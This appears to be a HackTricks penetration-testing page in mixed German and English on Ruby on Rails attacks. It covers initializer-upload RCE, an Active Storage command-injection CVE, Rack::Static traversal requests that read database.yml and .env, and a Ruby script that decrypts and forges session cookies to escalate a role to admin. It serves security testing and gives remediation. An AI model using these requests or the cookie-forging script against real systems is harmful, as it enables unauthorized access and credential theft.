Ruby-Tricks

Reading time: 5 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

File upload to RCE

As explained in this article, uploading a .rb file into sensitive directories such as config/initializers/ can lead to remote code execution (RCE) in Ruby on Rails applications.

Tipps:

Andere Boot-/eager-load-Orte, die beim App-Start ausgeführt werden, sind ebenfalls riskant, wenn sie writeable sind (z. B. config/initializers/ ist das klassische). Wenn du einen beliebigen Datei-Upload findest, der irgendwo unter config/ landet und später evaluiert/required wird, kannst du RCE beim Boot erhalten.
Suche nach dev/staging-Builds, die vom Benutzer kontrollierte Dateien in das Container-Image kopieren, in dem Rails sie beim Boot lädt.

Active Storage image transformation → command execution (CVE-2025-24293)

Wenn eine Anwendung Active Storage mit image_processing + mini_magick verwendet und untrusted Parameter an Bildtransformationsmethoden übergibt, könnten Rails-Versionen vor 7.1.5.2 / 7.2.2.2 / 8.0.2.1 Command Injection ermöglichen, weil einige Transformationsmethoden fälschlicherweise standardmäßig erlaubt waren.

A vulnerable pattern looks like:

erb

<%= image_tag blob.variant(params[:t] => params[:v]) %>

where params[:t] and/or params[:v] are attacker-controlled.

What to try during testing
Identify any endpoints that accept variant/processing options, transformation names, or arbitrary ImageMagick arguments.
Fuzz params[:t] and params[:v] for suspicious errors or execution side-effects. If you can influence the method name or pass raw arguments that reach MiniMagick, you may get code exec on the image processor host.
If you only have read-access to generated variants, attempt blind exfiltration via crafted ImageMagick operations.
Remediation/detections
If you see Rails < 7.1.5.2 / 7.2.2.2 / 8.0.2.1 with Active Storage + image_processing + mini_magick and user-controlled transformations, consider it exploitable. Recommend upgrading and enforcing strict allowlists for methods/params and a hardened ImageMagick policy.

Rack::Static LFI / path traversal (CVE-2025-27610)

If the target stack uses Rack middleware directly or via frameworks, versions of rack prior to 2.2.13, 3.0.14, and 3.1.12 allow Local File Inclusion via Rack::Static when :root is unset/misconfigured. Encoded traversal in PATH_INFO can expose files under the process working directory or an unexpected root.

Hunt for apps that mount Rack::Static in config.ru or middleware stacks. Try encoded traversals against static paths, for example:

text

GET /assets/%2e%2e/%2e%2e/config/database.yml
GET /favicon.ico/..%2f..%2f.env

Adjust the prefix to match configured urls:. If the app responds with file contents, you likely have LFI to anything under the resolved :root.

Mitigation: upgrade Rack; ensure :root only points to a directory of public files and is explicitly set.

Fälschen/Entschlüsseln von Rails-Cookies, wenn `secret_key_base` is leaked

Rails encrypts and signs cookies using keys derived from secret_key_base. If that value leaks (e.g., in a repo, logs, or misconfigured credentials), you can usually decrypt, modify, and re-encrypt cookies. This often leads to authz bypass if the app stores roles, user IDs, or feature flags in cookies.

Minimales Ruby, um moderne Cookies zu entschlüsseln und neu zu verschlüsseln (AES-256-GCM, Standard in aktuellen Rails):

ruby

require 'cgi'
require 'json'
require 'active_support'
require 'active_support/message_encryptor'
require 'active_support/key_generator'

secret_key_base = ENV.fetch('SECRET_KEY_BASE_LEAKED')
raw_cookie = CGI.unescape(ARGV[0])

salt   = 'authenticated encrypted cookie'
cipher = 'aes-256-gcm'
key_len = ActiveSupport::MessageEncryptor.key_len(cipher)
secret  = ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000).generate_key(salt, key_len)
enc     = ActiveSupport::MessageEncryptor.new(secret, cipher: cipher, serializer: JSON)

plain = enc.decrypt_and_verify(raw_cookie)
puts "Decrypted: #{plain.inspect}"

# Modify and re-encrypt (example: escalate role)
plain['role'] = 'admin' if plain.is_a?(Hash)
forged = enc.encrypt_and_sign(plain)
puts "Forged cookie: #{CGI.escape(forged)}"

Hinweise:

Ältere Apps können AES-256-CBC und Salts encrypted cookie / signed encrypted cookie, oder JSON/Marshal-Serializer verwenden. Passe Salts, cipher und serializer entsprechend an.
Bei Kompromittierung oder während einer Bewertung secret_key_base rotieren, um alle vorhandenen Cookies ungültig zu machen.

Siehe auch (Ruby/Rails-specific vulns)

Ruby deserialization and class pollution: Deserialization Ruby Class Pollution Ruby Json Pollution
Template injection in Ruby engines (ERB/Haml/Slim, etc.): SSTI (Server Side Template Injection)

Referenzen

Rails Sicherheitsankündigung: CVE-2025-24293 Active Storage unsafe transformation methods (behoben in 7.1.5.2 / 7.2.2.2 / 8.0.2.1). https://discuss.rubyonrails.org/t/cve-2025-24293-active-storage-allowed-transformation-methods-potentially-unsafe/89670
GitHub Advisory: Rack::Static Local File Inclusion (CVE-2025-27610). https://github.com/advisories/GHSA-7wqh-767x-r66v

tip